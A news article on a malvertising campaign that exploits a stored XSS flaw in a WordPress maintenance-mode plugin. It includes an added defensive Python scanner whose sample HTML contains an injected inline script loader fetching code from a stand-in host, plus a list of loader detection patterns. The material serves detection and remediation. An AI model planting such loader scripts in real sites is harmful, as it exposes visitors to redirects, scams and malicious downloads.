
Attackers abuse XSS vulnerability in WordPress plugin to display malverts

  • The XSS flaw allows an attacker to inject JavaScript or HTML code into the blog front-end of WordPress sites running the ‘Coming Soon Page & Maintenance Mode’ plugin version 1.7.8 or below.
  • This causes the compromised WordPress sites to display unwanted popup ads and redirect visitors to malicious landing pages, including tech support scams, malicious Android APKs, and pharmaceutical ads.

Wordfence's Defiant Threat Intelligence team observed an ongoing malvertising campaign that abuses a stored cross-site scripting (XSS) vulnerability in the Coming Soon Page & Maintenance Mode WordPress plugin.

What is the vulnerability?

The XSS flaw allows an attacker to inject JavaScript or HTML code into the blog front-end of WordPress sites running the ‘Coming Soon Page & Maintenance Mode’ plugin version 1.7.8 or below.

This causes the compromised WordPress sites to display unwanted popup ads and redirect visitors to malicious landing pages, including tech support scams, malicious Android APKs, and pharmaceutical ads.

The JavaScript injected into the sites is only a loader: it pulls additional code from third-party domains to assemble the full malicious payload, which runs in the browser of every visitor who opens an infected page.

Once the payload executes in a visitor's browser, it performs an initial redirect, choosing the destination according to the type of device the visitor is using.
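The two checks a site owner would want after reading the description above are whether the installed plugin is still at a vulnerable version and whether the rendered front end already carries an injected script loader. The following scanner is an added example, not code from the article or from Wordfence. It assumes that the plugin declares its version in the usual WordPress plugin header ("Version: x.y.z"), and the plugin header text and HTML page it scans are constructed sample input (the third-party hostnames use the reserved .invalid domain and stand in for whatever a real campaign would use).

```python
"""Offline checks for the stored XSS campaign described above (added example).

1. Parse the plugin's header comment and flag versions at or below 1.7.8.
2. Walk the front-page HTML and flag <script> tags that load from hosts
   outside an allowlist, or inline scripts that build a loader at runtime,
   which is how the injected code fetches its second stage.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

PATCHED_VERSION = (1, 7, 9)  # first fixed release per the advisory


def parse_version(s):
    """'1.7.8' -> (1, 7, 8), padded to three components for comparison."""
    parts = tuple(int(p) for p in re.findall(r"\d+", s))
    return parts + (0,) * (3 - len(parts))


def plugin_version_from_header(text):
    """Extract the 'Version:' field from a WordPress plugin header comment."""
    m = re.search(r"^\s*\*?\s*Version:\s*([\d.]+)", text, re.MULTILINE)
    return m.group(1) if m else None


def is_vulnerable_version(ver):
    """True for 1.7.8 and below, i.e. anything older than the patched 1.7.9."""
    return parse_version(ver) < PATCHED_VERSION


class ScriptCollector(HTMLParser):
    """Collect (src, inline_body) for every <script> element on the page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


# Inline constructs that fetch or unpack a second-stage script at runtime.
LOADER_PATTERNS = [
    r"document\.write\s*\(",
    r"createElement\s*\(\s*['\"]script['\"]\s*\)",
    r"\beval\s*\(",
    r"String\.fromCharCode",
    r"\.src\s*=\s*['\"]https?://",
]


def host_of(url):
    """Hostname of an absolute or protocol-relative URL; '' for same-origin paths."""
    return urlparse(url).netloc.split("@")[-1].split(":")[0].lower()


def find_suspicious_scripts(html, allowed_hosts):
    """Return (reason, detail) findings; same-origin and allowlisted loads are skipped."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src, body in collector.scripts:
        if src:
            host = host_of(src)
            if host and host not in allowed_hosts:
                findings.append(("external script", src))
        else:
            for pat in LOADER_PATTERNS:
                if re.search(pat, body):
                    findings.append(("inline loader", pat))
                    break
    return findings


def scan(plugin_header, html, allowed_hosts):
    ver = plugin_version_from_header(plugin_header)
    return {
        "plugin_version": ver,
        "vulnerable_version": bool(ver) and is_vulnerable_version(ver),
        "script_findings": find_suspicious_scripts(html, allowed_hosts),
    }


# Constructed sample input: a plugin header at the last vulnerable version and
# a front page with two legitimate scripts and two injected ones.
SAMPLE_PLUGIN_HEADER = """<?php
/*
Plugin Name: Coming Soon Page & Maintenance Mode
Version: 1.7.8
*/
"""

SAMPLE_HTML = """<!doctype html><html><head>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script src="https://www.example.com/wp-content/plugins/some-plugin/app.js"></script>
<script>var s=document.createElement('script');s.src='https://cdn.third-party.invalid/l.js';document.head.appendChild(s);</script>
<script src="//ads.third-party.invalid/x.js"></script>
</head><body>Coming soon</body></html>
"""

if __name__ == "__main__":
    print(scan(SAMPLE_PLUGIN_HEADER, SAMPLE_HTML, {"www.example.com"}))
```

Run it against the real plugin file and a saved copy of the site's front page (fetched as an anonymous visitor, since the "coming soon" page is what the public sees). The allowlist should contain the site's own hostname plus any CDN it legitimately loads from; an unexpected external host or an inline loader is worth inspecting even on a patched install, because updating the plugin does not remove content that was already stored.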

“The eventual destination sites vary in scope and intent. Some redirects land users on typical illegitimate ads for pharmaceuticals and pornography, while others attempt direct malicious activity against the user’s browser,” the researchers said.

XSS Attacks

The XSS injection attempts originate from IP addresses belonging to popular hosting providers, where the attackers operate obfuscated PHP shells with limited functionality. The injections are routed through a small set of such compromised sites in order to hide the true source of the activity.

The XSS flaw is patched in version 1.7.9 of the plugin; sites running 1.7.8 or below should update and then check their front-end content for injected scripts, since updating does not remove a payload that was already stored.
